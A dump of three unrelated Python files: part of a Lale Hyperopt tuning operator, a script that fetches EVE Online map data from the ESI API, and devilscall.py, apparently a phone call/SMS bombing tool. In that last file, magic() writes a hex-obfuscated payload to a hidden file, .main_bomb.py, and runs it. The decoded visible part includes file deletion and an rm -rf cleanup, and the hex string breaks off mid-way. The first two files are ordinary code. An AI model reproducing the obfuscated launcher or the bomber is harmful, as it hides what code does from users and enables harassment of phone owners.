            hyperopt_trial[0]["tid"] = tid
            hyperopt_trial[0]["misc"]["tid"] = tid
            for key in hyperopt_trial[0]["misc"]["idxs"].keys():
                hyperopt_trial[0]["misc"]["idxs"][key] = [tid]
            trials1.insert_trial_docs(hyperopt_trial)
            trials1.refresh()
        return trials1

    def proc_train_test(params, X_train, y_train, return_dict):
        # Wrapper around hyperopt_train_test that reports through a dict so
        # it can also run in a separate, killable process (see f() below).
        return_dict["params"] = copy.deepcopy(params)
        try:
            score, logloss, execution_time = hyperopt_train_test(
                params, X_train=X_train, y_train=y_train
            )
            # hyperopt minimizes, so report (best_score - score) as the loss.
            return_dict["loss"] = self.best_score - score
            return_dict["time"] = execution_time
            return_dict["log_loss"] = logloss
            return_dict["status"] = hyperopt.STATUS_OK
        except BaseException as e:
            exception_type = f"{type(e).__module__}.{type(e).__name__}"
            try:
                trainable = create_instance_from_hyperopt_search_space(
                    self.estimator, params
                )
                trial_info = (
                    f'pipeline: """{trainable.pretty_print(show_imports=False)}"""'
                )
            except BaseException:
                trial_info = f"hyperparams: {params}"
            error_msg = f"Exception caught in Hyperopt: {exception_type}, {traceback.format_exc()}with {trial_info}"
            logger.warning(error_msg + ", setting status to FAIL")
            return_dict["status"] = hyperopt.STATUS_FAIL
            return_dict["error_msg"] = error_msg
            if self.verbose:
                print(return_dict["error_msg"])

    def get_final_trained_estimator(params, X_train, y_train):
        # Refit the chosen configuration on the full training data.
        warnings.filterwarnings("ignore")
        trainable = create_instance_from_hyperopt_search_space(
            self.estimator, params
        )
        trained = trainable.fit(X_train, y_train)
        return trained

    def f(params):
        # Objective function handed to hyperopt.fmin; returns the result dict.
        current_time = time.time()
        if (self.max_opt_time is not None) and (
            (current_time - opt_start_time) > self.max_opt_time
        ):
            # if max optimization time set, and we have crossed it, exit optimization completely
            sys.exit(0)
        if self.max_eval_time:
            # Run hyperopt in a subprocess that can be interupted
            manager = multiprocessing.Manager()
            proc_dict = manager.dict()
            p = multiprocessing.Process(
                target=proc_train_test, args=(params, X_train, y_train, proc_dict)
            )
            p.start()
            p.join(self.max_eval_time)
            if p.is_alive():
                # Timed out: kill the evaluation and record a failure.
                p.terminate()
                p.join()
                logger.warning(
                    f"Maximum alloted evaluation time exceeded. with hyperparams: {params}, setting status to FAIL"
                )
                proc_dict["status"] = hyperopt.STATUS_FAIL
            if "status" not in proc_dict:
                # Subprocess died without reporting (e.g. hard crash).
                logger.warning("Corrupted results, setting status to FAIL")
                proc_dict["status"] = hyperopt.STATUS_FAIL
        else:
            proc_dict = {}
            proc_train_test(params, X_train, y_train, proc_dict)
        return proc_dict

    algo = getattr(hyperopt, self.algo)
    # Search in the search space with defaults
    if self.evals_with_defaults > 0:
        try:
            hyperopt.fmin(
                f,
                self.search_space_with_defaults,
                algo=algo.suggest,
                max_evals=self.evals_with_defaults,
                trials=self._default_trials,
                rstate=np.random.RandomState(SEED),
                show_progressbar=self.show_progressbar,
            )
        except SystemExit:
            logger.warning(
                "Maximum alloted optimization time exceeded. Optimization exited prematurely"
            )
        except AllTrialsFailed:
            self._best_estimator = None
            if hyperopt.STATUS_OK not in self._trials.statuses():
                raise ValueError(
                    "Error from hyperopt, none of the trials succeeded."
                )

    # Main search over the full space for the remaining evaluations.
    try:
        hyperopt.fmin(
            f,
            self.search_space,
            algo=algo.suggest,
            max_evals=self.max_evals - self.evals_with_defaults,
            trials=self._trials,
            rstate=np.random.RandomState(SEED),
            show_progressbar=self.show_progressbar,
        )
    except SystemExit:
        logger.warning(
            "Maximum alloted optimization time exceeded. Optimization exited prematurely"
        )
    except AllTrialsFailed:
        self._best_estimator = None
        if hyperopt.STATUS_OK not in self._trials.statuses():
            self._summarize_statuses()
            raise ValueError("Error from hyperopt, none of the trials succeeded.")

    # Fold the defaults-space trials into the main trial book.
    self._trials = merge_trials(self._trials, self._default_trials)
    if self.show_progressbar:
        self._summarize_statuses()
    try:
        best_trial = self._trials.best_trial
        val_loss = self._trials.best_trial["result"]["loss"]
        # Prefer the defaults-space winner if it achieved a lower loss.
        if len(self._default_trials) > 0:
            default_val_loss = self._default_trials.best_trial["result"]["loss"]
            if default_val_loss < val_loss:
                best_trial = self._default_trials.best_trial
        best_params = best_trial["result"]["params"]
        logger.info(
            "best score: {:.1%}\nbest hyperparams found using {} hyperopt trials: {}".format(
                self.best_score - self._trials.average_best_error(),
                self.max_evals,
                best_params,
            )
        )
        trained = get_final_trained_estimator(best_params, X_train, y_train)
        self._best_estimator = trained
    except BaseException as e:
        logger.warning(
            "Unable to extract the best parameters from optimization, the error: {}".format(
                e
            )
        )
        self._best_estimator = None
    return self
def predict(self, X_eval):
    """Predict with the best estimator found during fit().

    Raises ValueError when fit() was never called or all trials failed;
    returns None when the trained estimator itself raises ValueError.
    """
    import warnings

    warnings.filterwarnings("ignore")
    best = self._best_estimator
    if best is None:
        raise ValueError(
            "Can not predict as the best estimator is None. Either an attempt to call `predict` "
            "before calling `fit` or all the trials during `fit` failed."
        )
    try:
        predictions = best.predict(X_eval)
    except ValueError as e:
        logger.warning(
            "ValueError in predicting using Hyperopt:{}, the error is:{}".format(
                best, e
            )
        )
        predictions = None
    return predictions
def summary(self):
    """Table summarizing the trial results (ID, loss, time, log_loss, status).
    Returns
    -------
    result : DataFrame"""
    nan = float("nan")
    records = []
    for trial_dict in self._trials.trials:
        trial_result = trial_dict["result"]
        records.append(
            {
                "name": f'p{trial_dict["tid"]}',
                "tid": trial_dict["tid"],
                "loss": trial_result.get("loss", nan),
                "time": trial_result.get("time", nan),
                "log_loss": trial_result.get("log_loss", nan),
                "status": trial_result["status"],
            }
        )
    return pd.DataFrame.from_records(records, index="name")
def get_pipeline(self, pipeline_name=None, astype="lale"):
    """Retrieve one of the trials.
    Parameters
    ----------
    pipeline_name : union type, default None
        - string
          Key for table returned by summary(), return a trainable pipeline.
        - None
          When not specified, return the best trained pipeline found.
    astype : 'lale' or 'sklearn', default 'lale'
        Type of resulting pipeline.
    Returns
    -------
    result : Trained operator if best, trainable operator otherwise.
    """
    # Name of the best trial, if any trial succeeded.
    best_name = (
        f'p{self._trials.best_trial["tid"]}'
        if self._best_estimator is not None
        else None
    )
    requested = best_name if pipeline_name is None else pipeline_name
    if requested == best_name:
        result = getattr(self, "_best_estimator", None)
    else:
        # Re-instantiate the (untrained) pipeline from the trial's params.
        tid = int(requested[1:])
        params = self._trials.trials[tid]["result"]["params"]
        result = create_instance_from_hyperopt_search_space(self.estimator, params)
    if result is None or astype == "lale":
        return result
    assert astype == "sklearn", astype
    return result.export_to_sklearn_pipeline()
_hyperparams_schema = {
"allOf": [
{
"type": "object",
"required": [
"estimator",
"max_evals",
"cv",
"handle_cv_failure",
"max_opt_time",
"pgo",
"show_progressbar",
],
"relevantToOptimizer": ["estimator", "max_evals", "cv"],
"additionalProperties": False,
"properties": {
"estimator": {
"description": "Planned Lale individual operator or pipeline,\nby default LogisticRegression.",
"anyOf": [
{"laleType": "operator", "not": {"enum": [None]}},
{"enum": [None]},
],
"default": None,
},
"algo": {
"description": """Algorithm for searching the space.
Use 'rand' for random search,
'tpe' for tree of parzen estimators,
'atpe' for adaptive TPE,
'anneal' for variant on random search that takes some advantage of a smooth response surface.""",
"enum": ["rand", "tpe", "atpe", "anneal"],
"default": "tpe",
},
"max_evals": {
"description": "Number of trials of Hyperopt search.",
"type": "integer",
"minimum": 1,
"default": 50,
},
"frac_evals_with_defaults": {
"description": """Sometimes, using default values of hyperparameters works quite well.
This value would allow a fraction of the trials to use default values. Hyperopt searches the entire search space
for (1-frac_evals_with_defaults) fraction of max_evals.""",
"type": "number",
"minimum": 0.0,
"default": 0,
},
"cv": {
"description": """Cross-validation as integer or as object that has a split function.
The fit method performs cross validation on the input dataset for per
trial, and uses the mean cross validation performance for optimization.
This behavior is also impacted by handle_cv_failure flag.
If integer: number of folds in sklearn.model_selection.StratifiedKFold.
If object with split function: generator yielding (train, test) splits
as arrays of indices. Can use any of the iterators from
https://scikit-learn.org/stable/modules/cross_validation.html#cross-validation-iterators.""",
"anyOf": [
{"type": "integer"},
{"laleType": "Any", "forOptimizer": False},
],
"minimum": 1,
"default": 5,
},
"handle_cv_failure": {
"description": """How to deal with cross validation failure for a trial.
If True, continue the trial by doing a 80-20 percent train-validation
split of the dataset input to fit and report the score on the
validation part. If False, terminate the trial with FAIL status.""",
"type": "boolean",
"default": False,
},
"scoring": {
"description": """Scorer object, or known scorer named by string.
Default of None translates to `accuracy` for classification and `r2` for regression.""",
"anyOf": [
{
"description": """Custom scorer object created with `make_scorer`_.
The argument to make_scorer can be one of scikit-learn's metrics_,
or it can be a user-written Python function to create a completely
custom scorer objects, following the `model_evaluation`_ example.
The metric has to return a scalar value. Note that scikit-learns's
scorer object always returns values such that higher score is
better. Since Hyperopt solves a minimization problem, we pass
(best_score - score) to Hyperopt.
.. _`make_scorer`: https://scikit-learn.org/stable/modules/generated/sklearn.metrics.make_scorer.html#sklearn.metrics.make_scorer.
.. _metrics: https://scikit-learn.org/stable/modules/classes.html#module-sklearn.metrics
.. _`model_evaluation`: https://scikit-learn.org/stable/modules/model_evaluation.html
""",
"not": {"type": "string"},
},
{
"description": "Known scorer for classification task.",
"enum": [
"accuracy",
"explained_variance",
"max_error",
"roc_auc",
"roc_auc_ovr",
"roc_auc_ovo",
"roc_auc_ovr_weighted",
"roc_auc_ovo_weighted",
"balanced_accuracy",
"average_precision",
"neg_log_loss",
"neg_brier_score",
],
},
{
"description": "Known scorer for regression task.",
"enum": [
"r2",
"neg_mean_squared_error",
"neg_mean_absolute_error",
"neg_root_mean_squared_error",
"neg_mean_squared_log_error",
"neg_median_absolute_error",
],
},
],
"default": None,
},
"best_score": {
"description": """The best score for the specified scorer.
This allows us to return a loss to hyperopt that is >=0,
where zero is the best loss.""",
"type": "number",
"default": 0.0,
},
"max_opt_time": {
"description": "Maximum amout of time in seconds for the optimization.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"max_eval_time": {
"description": "Maximum amout of time in seconds for each evaluation.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"pgo": {
"anyOf": [{"description": "lale.search.PGO"}, {"enum": [None]}],
"default": None,
},
"show_progressbar": {
"description": "Display progress bar during optimization.",
"type": "boolean",
"default": True,
},
"args_to_scorer": {
"anyOf": [
{"type": "object"}, # Python dictionary
{"enum": [None]},
],
"description": """A dictionary of additional keyword arguments to pass to the scorer.
Used for cases where the scorer has a signature such as ``scorer(estimator, X, y, **kwargs)``.
""",
"default": None,
},
"verbose": {
"description": """Whether to print errors from each of the trials if any.
This is also logged using logger.warning.""",
"type": "boolean",
"default": False,
},
},
}
]
}
_input_fit_schema = {
"type": "object",
"required": ["X", "y"],
"properties": {"X": {}, "y": {}},
}
_input_predict_schema = {"type": "object", "required": ["X"], "properties": {"X": {}}}
_output_predict_schema: Dict[str, Any] = {}
_combined_schemas = {
"description": """Hyperopt_ is a popular open-source Bayesian optimizer.
.. _Hyperopt: https://github.com/hyperopt/hyperopt
Examples
--------
>>> from lale.lib.sklearn import LogisticRegression as LR
>>> clf = Hyperopt(estimator=LR, cv=3, max_evals=5)
>>> from sklearn import datasets
>>> diabetes = datasets.load_diabetes()
>>> X = diabetes.data[:150]
>>> y = diabetes.target[:150]
>>> trained = clf.fit(X, y)
>>> predictions = trained.predict(X)
Other scoring metrics:
>>> from sklearn.metrics import make_scorer, f1_score
>>> clf = Hyperopt(estimator=LR,
... scoring=make_scorer(f1_score, average='macro'), cv=3, max_evals=5)
""",
"documentation_url": "https://lale.readthedocs.io/en/latest/modules/lale.lib.lale.hyperopt.html",
"import_from": "lale.lib.lale",
"type": "object",
"tags": {"pre": [], "op": ["estimator"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
},
}
# Attach schema-derived docstrings to the impl class and expose it as a
# Lale operator under the public name `Hyperopt`.
lale.docstrings.set_docstrings(HyperoptImpl, _combined_schemas)

Hyperopt = lale.operators.make_operator(HyperoptImpl, _combined_schemas)
|
fetch-map.py | # Copyright © 2018 Po Huit
# [This program is licensed under the "MIT License"]
# Please see the file LICENSE in the source
# distribution of this software for license terms.
# Fetch EVE systems and stargates using ESI
from time import sleep
import http.client as client
import json
from sys import stdout, stderr
import threading
# Where to fetch the maps from.
esi_endpoint = "esi.evetech.net"
# What version to fetch.
esi_version = "latest"
# Number of retries before giving up.
max_retries = 5
# How long to wait between retries (secs).
retry_timeout = 5.0
# How long to wait before reopening the connection (secs).
reopen_timeout = 5.0
# Delay inserted to max at given request rate (per sec).
request_rate = 20.0
# Number of simultaneous fetch threads to spawn.
nthreads = 20
# https://stackoverflow.com/a/312464
def chunks(l, n):
    """Yield successive chunks of l, sized for splitting into about n chunks.

    The chunk size is len(l) // n but at least 1: the unguarded division
    produced a step of 0 whenever len(l) < n, which made range() raise
    ValueError. For len(l) >= n the behaviour is unchanged; an empty l
    yields nothing.
    """
    nl = len(l)
    nchunk = max(1, nl // n)  # guard: range() step must be positive
    for i in range(0, nl, nchunk):
        yield l[i:i + nchunk]
def log(*items):
    """Print the given items to stdout and flush immediately, so progress
    is visible even when output is piped or buffered."""
    print(*items)
    stdout.flush()
# Thread-local storage.
tls = threading.local()

def ccp_request(path):
    """Make an ESI request and return the decoded JSON body.

    Retries up to max_retries times (rate-limited; the connection is
    closed and reopened before the second attempt). Exits the process
    when every attempt fails.
    """
    url = "/" + esi_version + "/" + path + "/"
    for retries in range(max_retries):
        try:
            if retries == 1:
                # First retry: assume the connection went bad — wait,
                # then reopen it before trying again.
                sleep(reopen_timeout)
                tls.connection.close()
                tls.connection = client.HTTPSConnection(esi_endpoint)
            else:
                # Throttle to at most request_rate requests per second.
                sleep(1.0/request_rate)
            tls.connection.request('GET', url)
            response = tls.connection.getresponse()
            if response.status == 200:
                try:
                    return json.load(response)
                except json.decoder.JSONDecodeError as e:
                    print("json error: ", e, file=stderr)
            else:
                print("bad response status: ", response.status, file=stderr)
        except client.HTTPException as e:
            # Bug fix: HTTPException has no `.code` attribute, so the old
            # `print(..., e.code, ...)` raised AttributeError inside the
            # handler and masked the real error. Print the exception itself.
            print("http error: ", e, file=stderr)
        if retries < max_retries - 1:
            sleep(retry_timeout)
    print("fetch failed for", url, file=stderr)
    exit(1)
# Map of retrieved systems and stargates, shared by all worker threads.
by_system_id = dict()
by_stargate_id = dict()

# A thread worker.
def worker(systems):
    "Fetch the given systems' information via ESI."
    global by_system_id, by_stargate_id
    # Each thread gets its own HTTPS connection and private result dicts.
    tls.connection = client.HTTPSConnection(esi_endpoint)
    tls.by_system_id = dict()
    tls.by_stargate_id = dict()
    # Grab the systems.
    for system_id in systems:
        system = ccp_request('universe/systems/' + str(system_id))
        log(system['name'])
        tls.by_system_id[system_id] = system
    # Grab the stargates for each system.
    for system_id, system in tls.by_system_id.items():
        if 'stargates' not in system:
            continue
        stargates = system['stargates']
        for stargate_id in stargates:
            stargate = ccp_request('universe/stargates/' + str(stargate_id))
            log(system['name'], "->", stargate_id)
            tls.by_stargate_id[stargate_id] = stargate
    # Move system and stargate information to the global map.
    # NOTE(review): unsynchronized writes to the shared dicts — appears to
    # rely on CPython's GIL and on each thread writing disjoint system ids
    # (chunks are disjoint); confirm stargate ids never collide across threads.
    for system_id, system in tls.by_system_id.items():
        by_system_id[system_id] = system
    for stargate_id, stargate in tls.by_stargate_id.items():
        by_stargate_id[stargate_id] = stargate
# Open the master connection and get a list of systems.
tls.connection = client.HTTPSConnection(esi_endpoint)
systems = ccp_request('universe/systems')
nsystems = len(systems)
log(nsystems, "systems")

# Start and collect the threads; each thread fetches one chunk of systems.
threads = [threading.Thread(target=worker, args=(chunk,))
           for chunk in chunks(systems, nthreads)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# Write the output JSON with everything the workers collected.
info = {'systems': by_system_id, 'stargates': by_stargate_id}
with open('eve-map.json', 'w') as dumpfile:
    json.dump(info, dumpfile)
|
devilscall.py | #!/usr/bin/python3
# This Python file uses the following encoding: utf-8
import getpass
import base64
import multiprocessing
import gettext
import sys
#import ssl
import re
import json
import subprocess
import ctypes
import random
import datetime
from time import sleep
from os import system, environ, path, getuid
from distutils.dir_util import copy_tree
from multiprocessing import Process
from subprocess import check_output, CalledProcessError
from sys import stdout, argv, exit
#change is done
import getpass
import base64
# ANSI escape codes used for colored terminal output throughout the script.
RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, YELLOW2, GREEN2 = '\033[1;91m', '\033[46m', '\033[1;36m', '\033[1;32m', '\033[3;0m' , '\033[1;33m' , '\033[1;93m', '\033[1;92m'
def verCheck():
    """Compare the local version.txt with the upstream copy and self-update.

    Downloads the upstream version file (via wget) into test.txt, compares
    the first line of each file, and either reports an up-to-date install or
    pulls the newest release through a series of git commands.  After an
    update the process exits so the user can restart the refreshed script.
    Side effects: runs shell commands, deletes test.txt, may call exit().
    """
    system('clear')
    print("\n{0}[{2}#{0}] {2}Checking For Updates{2}...".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW ))
    system('wget -q -O test.txt https://raw.githubusercontent.com/404-ghost/Devil-s-Call/master/version.txt')
    system('clear')
    # 'with' blocks close the files deterministically; the original left the
    # handles open on several paths (notably the re-read in the update branch).
    with open('version.txt', 'r') as local_file:
        x = local_file.read().split("\n")
    with open('test.txt', 'r') as remote_file:
        z = remote_file.read().split("\n")
    if x[0] == z[0]:
        # Already current: quietly resync the tracked files and clean up.
        print("{0}[{2}#{0}] {2}[Up-To-Date]- {0}v {6}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0]))
        system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
        system('git stash --quiet')
        system('git pull --quiet')
        system('rm -rf test.txt')
        sleep(2)
    else:
        # Newer release upstream: report both versions, pull, then exit so
        # the user restarts with the updated code.
        print("\n{0}[{2}#{0}] {2}Their Is A Newer Version Available.".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
        print("{0}[{2}#{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}#{0}] {0}[{2}Available{0}]{2}- {0}v.{7}".format(RED, WHITE, CYAN, GREEN, DEFAULT, YELLOW, x[0], z[0]))
        print("{0}[{2}#{0}] {2}Updating To The Latest Version {0}[{2}v {6}{0}] \n{0}[{2}#{0}] {2}Please Wait....{7}\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0] ,GREEN2))
        system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
        system('git stash --quiet')
        system('git pull')
        sleep(1)
        system('rm -rf test.txt')
        # Re-read the now-updated local version for the status report.
        with open('version.txt', 'r') as local_file:
            x = local_file.read().split("\n")
        print("{0}[{2}*{0}] {2}Version Status After Update.{2}.\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
        print("{0}[{2}*{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}*{0}] {0}[{2}Available{0}]{2}- {0}v.{7}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, x[0], z[0]))
        sleep(1)
        system('clear')
        print("\n\n\n\t\t{2}[{0}#{2}] {0}Restart program \n {2}Enter this command to run {0}-> {3}python3 devilscall.py".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
        exit()
def loadingHack():
    """Animate a fake 'hacking' reveal of the startup banner, then launch
    the generated .main_bomb.py script.

    Reveals the banner one character at a time, trailing the revealed prefix
    with three random 'glitch' characters while they still fit inside the
    banner's width.  Blocks for ~0.06s per character.
    """
    system("clear")
    print("\n\n{3}".format(RED, WHITE, CYAN, GREEN, DEFAULT, YELLOW))
    chaine = "/////////////////////" + "[*]" + " Starting Devil-s-Call......" + "/////////////////////"
    # Raw string: the backslash is a literal character.  The original used
    # "\#", an invalid escape sequence that warns on modern CPython.
    charspec = r"$*X^%\#~?;"
    # The original wrapped this in a `while i < 1` loop that ran exactly
    # once; a single pass is equivalent.
    chainehack = ""
    for c in chaine:
        chainehack += c
        # Three random glitch characters trail the revealed prefix...
        r = random.choice(charspec) + random.choice(charspec) + random.choice(charspec)
        # ...but are dropped once they would overflow the banner width.
        if len(chainehack + r) > len(chaine):
            r = ""
        sys.stdout.write('\r' + chainehack + r)
        sleep(0.06)
    system("python3 .main_bomb.py")
def magic():
file1 = open(".main_bomb.py", "w")
L = '''
\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x0a\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e\x33\x0a\x23\x20\x54\x68\x69\x73\x20\x50\x79\x74\x68\x6f\x6e\x20\x66\x69\x6c\x65\x20\x75\x73\x65\x73\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x75\x74\x66\x2d\x38\x0a\x23\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x69\x73\x20\x64\x6f\x6e\x65\x20\x62\x79\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x70\x61\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x62\x61\x73\x65\x36\x34\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x74\x65\x78\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x23\x69\x6d\x70\x6f\x72\x74\x20\x73\x73\x6c\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6a\x73\x6f\x6e\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x63\x74\x79\x70\x65\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x61\x6e\x64\x6f\x6d\x0a\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x66\x72\x6f\x6d\x20\x74\x69\x6d\x65\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x6c\x65\x65\x70\x0a\x66\x72\x6f\x6d\x20\x6f\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x74\x65\x6d\x2c\x20\x65\x6e\x76\x69\x72\x6f\x6e\x2c\x20\x70\x61\x74\x68\x2c\x20\x67\x65\x74\x75\x69\x64\x2c\x20\x72\x65\x6d\x6f\x76\x65\x0a\x66\x72\x6f\x6d\x20\x64\x69\x73\x74\x75\x74\x69\x6c\x73\x2e\x64\x69\x72\x5f\x75\x74\x69\x6c\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x6f\x70\x79\x5f\x74\x72\x65\x65\x0a\x66\x72\x6f\x6d\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x68\x65\x63\x6b\x5f\x6f\x75\x74\x70\x75\x74\x2c\x20\x43\x61\x6c\x6c\x65\x64\x50\x72\x6f\x63\x65\x73\x73\x45\x72\x72\x6f\x72\x0a\x66\x72\x6f\x6d
\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x20\x69\x6d\x70\x6f\x72\x74\x20\x50\x72\x6f\x63\x65\x73\x73\x0a\x66\x72\x6f\x6d\x20\x73\x79\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x64\x6f\x75\x74\x2c\x20\x61\x72\x67\x76\x2c\x20\x65\x78\x69\x74\x0a\x66\x72\x6f\x6d\x20\x64\x61\x74\x61\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x61\x70\x69\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x62\x61\x6e\x6e\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x32\x2c\x20\x47\x52\x45\x45\x4e\x32\x20\x3d\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x31\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x34\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x33\x3b\x30\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x33\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x32\x6d\x27\x0a\x62\x6c\x69\x6e\x6b\x20\x3d\x20\x22\x5c\x30\x33\x33\x5b\x35\x6d\x22\x0a\x63\x6f\x6c\x6f\x72\x73\x3d\x5b\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x5d\x0a\x57\x3d\x27\x5c\x30\x33\x33\x5b\x30\x6d\x27\x0a\x64\x65\x66\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x2e\x6d\x61\x69\x6e\x5f\x62\x6f\x6d\x62\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x61\x70\x69\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66
\x20\x64\x61\x74\x61\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x22\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x47\x52\x45\x45\x4e\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x54\x68\x61\x6e\x6b\x73\x20\x46\x6f\x72\x20\x55\x73\x69\x6e\x67\x20\x54\x68\x69\x73\x20\x54\x6f\x6f\x6c\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x23\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x71\x28\x29\x3a\x0a\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x22\x5c\x6e\x44\x6f\x20\x79\x6f\x75\x20\x61\x67\x72\x65\x65\x20\x74\x6f\x20\x75\x73\x65\x20\x74\x68\x69\x73\x20\x74\x6f\x6f\x6c\x20\x66\x6f\x72\x20\x65\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x